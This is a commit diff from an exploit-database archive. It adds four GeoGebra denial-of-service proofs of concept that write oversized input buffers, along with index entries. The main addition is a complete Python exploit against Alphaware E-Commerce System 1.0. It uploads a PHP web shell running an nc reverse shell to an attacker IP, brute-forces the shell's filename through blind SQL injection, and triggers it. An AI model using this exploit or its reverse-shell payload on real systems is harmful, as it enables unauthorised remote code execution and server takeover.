DB: 2021-03-17
6 changes to exploits/shellcodes GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
This commit is contained in:
parent
28bd450c1a
commit
3e6d011cf0
7 changed files with 188 additions and 0 deletions
28
exploits/android/local/49656.py
Executable file
28
exploits/android/local/49656.py
Executable file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
|
||||||
|
# Date: 2021-03-15
|
||||||
|
# Author: Brian Rodríguez
|
||||||
|
# Software Site: https://www.geogebra.org/download
|
||||||
|
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
|
||||||
|
# Version: 5.0.511.0
|
||||||
|
# Category: DoS (Android)
|
||||||
|
|
||||||
|
##### Vulnerability #####
|
||||||
|
|
||||||
|
Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.
|
||||||
|
|
||||||
|
Successful exploitation will causes application stop working.
|
||||||
|
|
||||||
|
I have been able to test this exploit against Android 10.0.
|
||||||
|
|
||||||
|
##### PoC #####
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
buffer = "\x41" * 8000
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = open("payload.txt","w")
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print ("File created")
|
||||||
|
except:
|
||||||
|
print ("File cannot be created")
|
|
@ -5,6 +5,7 @@
|
||||||
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
|
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
|
||||||
# Version: 2.1-3.3
|
# Version: 2.1-3.3
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
|
# CVE: CVE-2021-27695
|
||||||
|
|
||||||
Summary:
|
Summary:
|
||||||
|
|
||||||
|
|
76
exploits/php/webapps/49652.py
Executable file
76
exploits/php/webapps/49652.py
Executable file
|
@ -0,0 +1,76 @@
|
||||||
|
# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
|
||||||
|
# Date: 15-03-2021
|
||||||
|
# Exploit Author: Christian Vierschilling
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html
|
||||||
|
# Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: PHP 7.4.14, Linux x64_x86
|
||||||
|
|
||||||
|
# --- Description --- #
|
||||||
|
|
||||||
|
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
|
||||||
|
# We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.
|
||||||
|
|
||||||
|
# --- Proof of concept --- #
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
import random
|
||||||
|
import sys
|
||||||
|
import requests
|
||||||
|
from requests_toolbelt.multipart.encoder import MultipartEncoder
|
||||||
|
|
||||||
|
def file_upload(target_ip, attacker_ip, attacker_port):
|
||||||
|
random_number = str(random.randint(100000000,999999999))
|
||||||
|
file_name = "SHELL.php"
|
||||||
|
revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
|
||||||
|
m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'})
|
||||||
|
print("(+) Uploading php reverse shell file ..")
|
||||||
|
r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
|
||||||
|
return random_number
|
||||||
|
|
||||||
|
def trigger_shell_sqli(target_ip,product_id):
|
||||||
|
target_file_name = ''
|
||||||
|
url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip)
|
||||||
|
print("(+) Now setting up our sqli for file name guessing ..")
|
||||||
|
|
||||||
|
# STEP 1: Get length of target column in database ..
|
||||||
|
for i in range(1, 200):
|
||||||
|
payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)}
|
||||||
|
r2 = requests.post(url, data=payload, allow_redirects=False)
|
||||||
|
|
||||||
|
# STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-)
|
||||||
|
if str(r2.status_code) == '302':
|
||||||
|
print("(+) Initial sqli successful, got length of our target file name!")
|
||||||
|
print("(+) Now for the filename.. ", end = '')
|
||||||
|
for j in range(1, i+1):
|
||||||
|
for brutechar in range(32, 126):
|
||||||
|
payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)}
|
||||||
|
r3 = requests.post(url, data=payload, allow_redirects=False)
|
||||||
|
if str(r3.status_code) == '302':
|
||||||
|
target_file_name = target_file_name + chr(brutechar)
|
||||||
|
print(chr(brutechar), end = '')
|
||||||
|
sys.stdout.flush()
|
||||||
|
break
|
||||||
|
|
||||||
|
url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0])
|
||||||
|
print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url))
|
||||||
|
r4 = requests.get(url)
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) != 4:
|
||||||
|
print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
|
||||||
|
print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
target_ip = sys.argv[1]
|
||||||
|
attacker_ip = sys.argv[2]
|
||||||
|
attacker_port = sys.argv[3]
|
||||||
|
|
||||||
|
product_id = file_upload(target_ip, attacker_ip, attacker_port)
|
||||||
|
trigger_shell_sqli(target_ip, product_id)
|
||||||
|
|
||||||
|
print("(+) done!")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
26
exploits/windows/local/49653.py
Executable file
26
exploits/windows/local/49653.py
Executable file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)
|
||||||
|
# Date: 2021-03-15
|
||||||
|
# Exploit Author: Brian Rodriguez
|
||||||
|
# Vendor Homepage: https://www.geogebra.org
|
||||||
|
# Software Link: https://www.geogebra.org/download
|
||||||
|
# Version: 6.0.631.0-offlinegraphing
|
||||||
|
# Tested on: Windows 8.1 Pro
|
||||||
|
|
||||||
|
# STEPS
|
||||||
|
# Open the program Graficadora
|
||||||
|
# Run the python exploit script payload.py, it will create a new payload.txt file
|
||||||
|
# Copy the content of the file "payload.txt"
|
||||||
|
# Paste the content from payload.txt in the field "Entrada..."
|
||||||
|
# Crashed
|
||||||
|
|
||||||
|
--> payload.py <--
|
||||||
|
#!/usr/bin/env python
|
||||||
|
buffer = "\x41" * 8000
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = open("payload.txt","w")
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print ("File created")
|
||||||
|
except:
|
||||||
|
print ("File cannot be created")
|
26
exploits/windows/local/49654.py
Executable file
26
exploits/windows/local/49654.py
Executable file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
|
||||||
|
# Date: 2021-03-15
|
||||||
|
# Exploit Author: Brian Rodriguez
|
||||||
|
# Vendor Homepage: https://www.geogebra.org
|
||||||
|
# Software Link: https://www.geogebra.org/download
|
||||||
|
# Version: 5.0.631.0-d
|
||||||
|
# Tested on: Windows 8.1 Pro
|
||||||
|
|
||||||
|
#STEPS
|
||||||
|
# Open the program GeoGebra
|
||||||
|
# Run the python exploit script payload.py, it will create a new payload.txt file
|
||||||
|
# Copy the content of the file "payload.txt"
|
||||||
|
# Paste the content in the field "Entrada:"
|
||||||
|
# Crashed
|
||||||
|
|
||||||
|
--> payload.py <--
|
||||||
|
#!/usr/bin/env python
|
||||||
|
buffer = "\x41" * 800000
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = open("payload.txt","w")
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print ("File created")
|
||||||
|
except:
|
||||||
|
print ("File cannot be created")
|
26
exploits/windows/local/49655.py
Executable file
26
exploits/windows/local/49655.py
Executable file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
|
||||||
|
# Date: 2021-03-15
|
||||||
|
# Exploit Author: Brian Rodriguez
|
||||||
|
# Vendor Homepage: https://www.geogebra.org
|
||||||
|
# Software Link: https://www.geogebra.org/download
|
||||||
|
# Version: 6.0.631.0-offlinecas
|
||||||
|
# Tested on: Windows 8.1 Pro
|
||||||
|
|
||||||
|
# STEPS
|
||||||
|
# Open the program Calculadora CAS
|
||||||
|
# Run the python exploit script payload.py, it will create a new payload.txt file
|
||||||
|
# Copy the content of the file "payload.txt"
|
||||||
|
# Paste the content from payload.txt in the field "Entrada..."
|
||||||
|
# Crashed
|
||||||
|
|
||||||
|
--> payload.py <--
|
||||||
|
#!/usr/bin/env python
|
||||||
|
buffer = "\x41" * 8000
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = open("payload.txt","w")
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print ("File created")
|
||||||
|
except:
|
||||||
|
print ("File cannot be created")
|
|
@ -11286,6 +11286,10 @@ id,file,description,date,author,type,platform,port
|
||||||
49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
||||||
49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
||||||
49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
||||||
|
49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
|
||||||
|
49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
|
||||||
|
49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
|
||||||
|
49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -43837,3 +43841,4 @@ id,file,description,date,author,type,platform,port
|
||||||
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
|
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
|
||||||
49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
|
49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
|
||||||
49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
|
49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
|
||||||
|
49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue